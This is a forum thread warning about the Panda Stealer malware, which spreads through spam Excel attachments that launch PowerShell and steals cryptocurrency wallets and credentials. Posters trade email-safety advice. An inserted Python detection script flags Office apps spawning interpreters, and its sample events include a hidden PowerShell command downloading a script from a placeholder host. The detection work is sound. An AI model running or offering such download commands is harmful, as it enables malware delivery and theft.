Topic: {Warning}: New Panda Stealer Targets Cryptocurrency Wallets

hero member
Activity: 2520
Merit: 952
Rule of thumb for these types of attacks is to ignore every email with an attachment unless you expected it.
hero member
Activity: 3150
Merit: 636
Sometimes being lazy about opening unsolicited emails is helpful to us. If you don't know the source of an email, you better not open it.

Nothing bad will happen if we open any e-mail we receive, this in itself is not a danger because as far as I know it still takes a little more than just opening an e-mail for something bad to happen. It’s important not to download any attachments that come in such emails, but as they say “curiosity killed a cat”, and people who are curious (and careless) often fall into the trap.

What I would especially like to point out is that you should beware of e-mails that only seemingly come from people you know, because someone can target you specifically - so a legitimate e-mail can be [email protected], and the hacker is sending from [email protected] a message with content that says "look at my latest holiday pictures" just click on attachments.
You're right. There's no danger in opening it but with the example, you've given, that's making a person put him near to the danger that email has attached.

It is okay to be curious but when it comes to attachments, the danger starts especially if the link goes with those informal set of links that they're including and sometimes in file formats that will hit the receiver's curiosity.

But for those that are wanting to avoid them fully and don't want to hit their curiosity, ignoring and deleting them quickly would be the best measure.
legendary
Activity: 3234
Merit: 5637
Sometimes being lazy about opening unsolicited emails is helpful to us. If you don't know the source of an email, you better not open it.

Nothing bad will happen if we open any e-mail we receive, this in itself is not a danger because as far as I know it still takes a little more than just opening an e-mail for something bad to happen. It’s important not to download any attachments that come in such emails, but as they say “curiosity killed a cat”, and people who are curious (and careless) often fall into the trap.

What I would especially like to point out is that you should beware of e-mails that only seemingly come from people you know, because someone can target you specifically - so a legitimate e-mail can be [email protected], and the hacker is sending from [email protected] a message with content that says "look at my latest holiday pictures" just click on attachments.
hero member
Activity: 3150
Merit: 636
Sometimes being lazy about opening unsolicited emails is helpful to us. If you don't know the source of an email, you better not open it.

And those attachments that are included on those emails, if you don't trust them, never bother yourself to click it.
hero member
Activity: 2800
Merit: 595
Yep spam emails are still being checked by users, you got to be the most naive to really install something that is just attached to an email you found in your inbox. This stealer must have been very zealous to have sent to thousands of email addresses and only get one.

This is why I don't bother opening any mail that I'm not expecting, the only way for this to become active on your PC is clicking which is a bait, OP how about mobile? Can this ticking timebomb mails affect smartphones as well?

I've read the attached article, and I can't find anything mentioning mobile or smartphones.

However, I wouldn't just relax here; sooner or later these threat actors will evolve and might create an iteration of the said malware that will target mobile phones too. We all know that they are looking for every opportunity in the crypto space because of the potential to hit one victim with crypto worth millions of dollars.

Sometimes it could get listed on the App Store, but there's got to be some reason why someone would install it on their phone.

legendary
Activity: 3080
Merit: 1353
This is why I don't bother opening any mail that I'm not expecting, the only way for this to become active on your PC is clicking which is a bait, OP how about mobile? Can this ticking timebomb mails affect smartphones as well?

I've read the attached article, and I can't find anything mentioning mobile or smartphones.

However, I wouldn't just relax here; sooner or later these threat actors will evolve and might create an iteration of the said malware that will target mobile phones too. We all know that they are looking for every opportunity in the crypto space because of the potential to hit one victim with crypto worth millions of dollars.
member
Activity: 248
Merit: 13
This is why I don't bother opening any mail that I'm not expecting, the only way for this to become active on your PC is clicking which is a bait, OP how about mobile? Can this ticking timebomb mails affect smartphones as well?
hero member
Activity: 2282
Merit: 659
A new malware was discovered last month and is being called "Panda Stealer". It is mostly spread across the United States, Australia, Japan and Germany.

Mode of infection

1. Spam email pretending to be a business quote request. It has an XLS attachment which, obviously, has malicious content



2. Another attachment, but this time the XLS contained an Excel formula that utilizes a PowerShell command



Cryptocurrencies being targeted and others:

Quote
Once installed, Panda Stealer can collect details like private keys and records of past transactions from its victim’s various digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum. Not only does it target cryptocurrency wallets, it can steal credentials from other applications such as NordVPN, Telegram, Discord, and Steam. It’s also capable of taking screenshots of the infected computer and exfiltrating data from browsers like cookies, passwords, and cards.

https://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html

So again, be careful even if you are not living in those countries that have been mentioned as the main target for now. The malware might not target bitcoin for now, but for sure these cyber actors are going to evolve. So don't open any attachment, especially one coming from an unknown source.

Now this is really scary and thank you for the heads up. These hackers are trying to be one step ahead of the security measures like what happened in the previous exchange hacking incidents on Binance, etc. So they’ve created this malware and target emails involved in crypto.

And yes, it’s better to have a separate email only for cryptos, and it’s not good to store our private keys or seed phrases there because of this new malware being spread. It could happen in other countries soon. Will tell my crypto friends about this.
legendary
Activity: 3234
Merit: 5637
In that case wouldn't this be mitigated by your firewall blocking the Excel access to the internet altogether and by default?

Most people don't even have an antivirus program, and a firewall is something that the average Joe finds even harder to understand. I know the W10 has its own firewall that is turned on by default, but I'm not sure how well, or badly it does its job. When it comes to educating young people about computer security, I think we are generally in a very bad position - how else to explain so many online scams that have increased even more thanks to the pandemic.

I found an interesting example from Singapore that shows the scale of such activities, so while it’s not solely about whether someone has an AV or a firewall, it still clearly shows that people still can’t distinguish good from bad.
member
Activity: 280
Merit: 28
For ages this warning exists and is being repeated by literally everyone: don't open attachments or click on links in emails, especially emails from unknown sources. I thought by 2021 every internet user would know that but no, there are still people out there who fall for it.
legendary
Activity: 2338
Merit: 10802
When it talks about two infection chains, I figure it means that it has two alternative deployment methods, one based on an xlsm and the other on an xls (like an A/B test to see which gets better results, or simply a way to diversify the attack).

In either case, the usual should apply, which is don’t fall for the call to action to open the attached email file (xls or xlsm). It doesn’t specify here what the call to action message is, except for the fact that it’s business related (i.e. "Please verify your invoice in the attached file" or so).

This particular malware targets crypto related stuff, which is likely going to be a trend as more people get into the game over time.
legendary
Activity: 3472
Merit: 10611
Am I understanding this correctly that the Email itself doesn't contain the malware but a command that when executed through Excel(?) downloads the actual malware from the internet (paste.ee?), right?
In that case wouldn't this be mitigated by your firewall blocking the Excel access to the internet altogether and by default?
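
The chain asked about in the post above (an Excel attachment launching a PowerShell command that then fetches the payload) appears in process-creation logs as an Office parent with a script-interpreter child. An added example, not part of the thread: a Python triage over constructed Sysmon-style events; the field names, the `paste.example` URL and the severity labels are assumptions.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style field names, assumed).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest '
                    '-Uri https://paste.example/raw/PLACEHOLDER -OutFile q.ps1"'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe 8192"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-ChildItem"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c ver"},
]

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe",
                   "wscript.exe", "cscript.exe", "mshta.exe"}
URL_RE = re.compile(r"https?://[^\s'\")]+", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(in(dowstyle)?)?\s+h(idden)?\b", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage(event):
    """Return a finding if an Office app spawned a script interpreter, else None."""
    parent, child = basename(event["ParentImage"]), basename(event["Image"])
    if parent not in OFFICE_PARENTS or child not in SCRIPT_CHILDREN:
        return None
    cmd = event.get("CommandLine", "")
    urls = URL_RE.findall(cmd)
    reasons = [f"{parent} spawned {child}"]
    if urls:
        reasons.append("command line references a URL")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden window requested")
    # The parent/child pair alone is worth a look; extra signals raise severity.
    severity = "high" if len(reasons) > 1 else "medium"
    return {"severity": severity, "reasons": reasons, "urls": urls}

def scan(events):
    """List of (event index, finding) for every event that triggers."""
    return [(i, t) for i, e in enumerate(events) if (t := triage(e))]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(idx, finding["severity"], "; ".join(finding["reasons"]), finding["urls"])
```

When the download is made by the spawned PowerShell process rather than by EXCEL.EXE itself, a firewall rule scoped only to the Excel program does not cover that connection, which is why the parent/child relationship is the more reliable signal.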
legendary
Activity: 1512
Merit: 4795
Or better yet have a practice to separate our crypto related emails, and other personal emails or throw away emails. So that when we received an email to our crypto related account, that is a red flag already and should be deleted at once.
You are right, but not only crypto users can receive phishing email messages, it can happen to any other email accounts; users' data on online platforms can be breached at any time by hackers, which is frequent these days. Also some people like giving their emails to online platforms without even caring to know if their data are protected or not. For maximum protection against such phishing attacks, we need to limit the information we share online and yet not click on links in email messages we did not authorize, but as for me, I do not even open such email messages at all.


And there could be people who can fall for this trick, maybe some will open and then they become the next victim here.
Yes, some people can fall for this type of online attack, that is why it is good to only click on email messages you authorized for. We all at one point in time gave out email for certain reasons online, data breach can be from anywhere.
hero member
Activity: 1414
Merit: 542
Not even an email but spam email, that means some people will still go ahead checking spam messages when not authorized to receive an email message. To be on the safe side, it is better to even see many email messages included as spam messages because there are some that can lead to phishing attempts or contain malicious links just like you mentioned. I only click on links that I authorized because I do not trust any other link. People can be so ridiculous, because of ignorance and greed.

Or better yet have a practice to separate our crypto related emails, and other personal emails or throw away emails. So that when we received an email to our crypto related account, that is a red flag already and should be deleted at once.

And there could be people who can fall for this trick, maybe some will open and then they become the next victim here.
legendary
Activity: 1512
Merit: 4795
Not even an email but spam email, that means some people will still go ahead checking spam messages when not authorized to receive an email message. To be on the safe side, it is better to even see many email messages included as spam messages because there are some that can lead to phishing attempts or contain malicious links just like you mentioned. I only click on links that I authorized because I do not trust any other link. People can be so ridiculous, because of ignorance and greed.
legendary
Activity: 2576
Merit: 1655
A new malware was discovered last month and is being called "Panda Stealer". It is mostly spread across the United States, Australia, Japan and Germany.

Mode of infection

1. Spam email pretending to be a business quote request. It has an XLS attachment which, obviously, has malicious content



2. Another attachment, but this time the XLS contained an Excel formula that utilizes a PowerShell command



Cryptocurrencies being targeted and others:

Quote
Once installed, Panda Stealer can collect details like private keys and records of past transactions from its victim’s various digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum. Not only does it target cryptocurrency wallets, it can steal credentials from other applications such as NordVPN, Telegram, Discord, and Steam. It’s also capable of taking screenshots of the infected computer and exfiltrating data from browsers like cookies, passwords, and cards.

https://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html

So again, be careful even if you are not living in those countries that have been mentioned as the main target for now. The malware might not target bitcoin for now, but for sure these cyber actors are going to evolve. So don't open any attachment, especially one coming from an unknown source.